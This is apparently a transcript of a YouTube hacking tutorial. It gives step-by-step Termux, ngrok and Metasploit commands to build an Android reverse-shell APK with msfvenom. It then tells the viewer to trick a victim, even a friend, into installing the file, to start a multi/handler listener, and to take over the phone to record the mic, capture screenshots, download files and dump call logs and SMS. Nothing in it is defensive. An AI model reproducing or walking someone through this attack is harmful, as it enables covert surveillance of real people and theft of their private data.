Hi friends, welcome to the channel Anonymous.sploit for dream hackers. Today we will see how to hack an Android phone from Android phone. For that you need to download an app called Termax in which you will be performing codes. I have given the link in description. Go ahead and download it. After downloading the Termax, just open it. Let me open. See, after opening Termax, you need to type the following codes which will be shown on screen as it is. Type PWD and click on enter. Now type Termax dash setup dash storage and click on enter. See guys, I have already given the permission, so it is not asking me, but for you it will ask to allow or deny. Just click on allow. After allowing, just exit from the Termax. We need to download a tool called NGRock. To download the tool NGRock, and we need to go to Chrome. Open your Chrome and type ngrock.com. Click on get started for free. See, I have already logged in into NGRock, but for you it will ask to log in. Just log in with your email address, and after logging in it will show you dashboard like this. Now we need to download NGRock. For that, just download NGRock by clicking download for Linux ARM. I have already downloaded it, so I am not downloading it. After downloading it, open Termax and type cd storage. Now type ls. Now type cd downloads and click on enter. Now type ls. See, in my storage, my downloads, there is only NGRock zip, so it is not showing anything, but for you it will show all your download files. Let's search for NGRock stable Linux ARM .zip. For easy typing, I am just copying it. Let me copy it. After copying, now type cp NGRock dash stable dash Linux dash ARM.zip dollar capital home. It will be copied to our home directory. Now we need to type cd space dot for 2 times and click on enter. You need to click enter for every command. Now list it out by ls. Send it. It will show you all the files in our home directory. You can see NGRock file, downloads. I have installed many other files, so it will be showing many files. Now type unzip space NGRock dash stable dash Linux dash ARM.zip. Click on enter. I have already done this, so it is asking me whether to replace it or not, but for you it will extract, so be patient. I am replacing it by y, a, but for you it will just unzip it. Just wait patiently. Now type dot slash NGRock space dash h and enter. Now we need NGRock auth token. For that, go to Chrome. You can see guys, connect your account auth token. Just copy it from dot slash to the end of the token. I have blurred my token number. Never share your token number guys. And open it and paste it here and send. See, after sending, our NGRock is successfully installed. Now we need to start it. To start it, we need to enter the command dot slash NGRock space TCP space 8080 and click on send it. it will connect. If it is not connecting, we need to turn on our hotspot. Just turn on your hotspot and wait for it. Our status must be online. See, my status is online. Now click on new session. Swipe right and click on new session. After clicking on, now we need to install Metasploit. For that, follow the following commands. Type pkg install pkg space install space apt. For you it may take some time. Just wait patiently. Yes, it is installed. After installing, we need to type another command, that is apt space update. Just type it, apt space update, and click on enter. And wait for it installing. We need to upgrade it. For upgrading, type apt space upgrade and send. Now it will ask if we want to continue or not. Just enter like and send it. Yeah, it is completed. Now we need to install unstable repo. For installing unstable repo, type the command apt space install space unstable dash repo. Do not give any other extra spaces. Just enter as it is. For you it may take some time, but for me it is completed. After installing this, we need to install Metasploit, from which we are going to hack the victim's phone. For installing Metasploit, the command is apt space install space Metasploit. I have already installed Metasploit, so it is faster for me. But for you, it may take some time. Just wait patiently. It may take up to 20 minutes or 15 minutes. After installing, we need to type the commands msf console without space. I'm sorry, I entered with space. You need to enter it without space. msf console and click on send. Just wait patiently. We entered msf console to start our Metasploit framework. We need to wait some time. See, now you can see that starting the Metasploit framework console. This let us perform attacks on other Android phones. See, now you can see MSF5, which means Metasploit has successfully started. See guys, now just exit it. We need to do our packages. Just type exit and click on send. After exiting, we will create an APK file from which we will attack the victim's phone. Just enter exit and click on send. See guys, now this is the most important part we are doing. See, Need to enter the commands as it is. Any extra letter, extra space or capital letter will result in errors, so just follow the steps very carefully. Now open the termux. After exiting the MSF console, open the termux and type msf venom space dash p space android slash victor reader slash reverse underscore tcp space lhost. Here our lhost is in. Open the session 1. You can see in forwarding 0.tcp.ngrok. Copy it and paste it here. lhost is equals to, now space type lport is equals to, for lport you can see the number beside ngrok.io in forwarding. Copy it and paste it, and space capital R space greater than symbol space storage slash downloads slash. See, after entering storage and downloads, we need to enter our APK file which we will send to victims. I am entering the APK file name as H4cking.apk. You can enter your own file name and put .apk last. After completing, just click on send. Now just you need to wait for the app to create our APK file. It will create our APK file. We need to send it to the victim's phone and ask him to install it. After installing, we can have complete access to it. I am not cutting any video, so it is taking some time. See, you can see here guys, our APK is created. It shows payload size is equals to 10190 bytes, which is 10 KB. You guys, to open the APK file, you need to go to the file manager. Go to the file manager and open internal storage. Go to downloads folder. Open it. You can see that our APK file is created. You can see the APK which I named is created. Just share it with your friends who you want to hack their phone and ask them to install and open it. Now you need to use your creativity to make them install it. After installing it, open termux and click on new session. Now type msf console and click on enter. Just wait patiently. We are opening our Metasploit here. Just wait guys. You can see the Metasploit framework started. Use your creativity and make your friends to install the APK which you have created. See, now you can see guys, this Metasploit framework will be different from different. Now I can see a dog like something, but you guys make a different one. Now type use space exploit slash multi slash handler and click on enter, so that multi handler will be started in Metasploit. See, you can see MSFI exploit multi handler. It has started. After starting this multi handler, enter the following commands. Type set space payload space android slash interpreter slash reverse underscore TCP and click on enter. Now type set space a host space. See, for a host you need to go to the first session in which ngrok has started. Here host is, you can see web interface and HTTP 127.0.0.0.1. For you it may be different or same. Just enter it after set space lhost space 127.0.0.1. I have entered it without space. I will enter it again. Set space lhost space 127.0.0.1 and click on enter. Now I need to set L port. For that type set space L port space 8080 and click on enter. After this just type exploit. See guys, I have sent an APK file to one of my friend and asked him to install it. After installing, he should open the app. Just tell him to install the app and open it. After opening guys, you can see, just let me enter the exploit once again. After opening, you can see session 1 has started and we just haven't started. But for you, based on your internet connection speed and the victim's internet connection speed, you will get the session started. Just wait for it. Yes, you can see that Metasploit session 1 open. That means the victim has installed our APK file and he opened it. Just wait for you to get the command of his phone. You can see now Metasploit has started. See, now type help to know which commands shows which command does which work. Just type help and click on enter. Now you guys can see that I have got lot of commands and in the description here. You can type screen share, screenshot, record mic, secure, IP configuration, upload, edit, download, APK install, APK list, APK run, APK uninstall. Just enter these commands and the work will be done in the victim's phone. I will show you guys how to open these dumped call logs of the victims, dumped SMSs of the victims in the next video, and the video will be very small, maybe 5 minutes. Just subscribe.
Baik, Indonesia.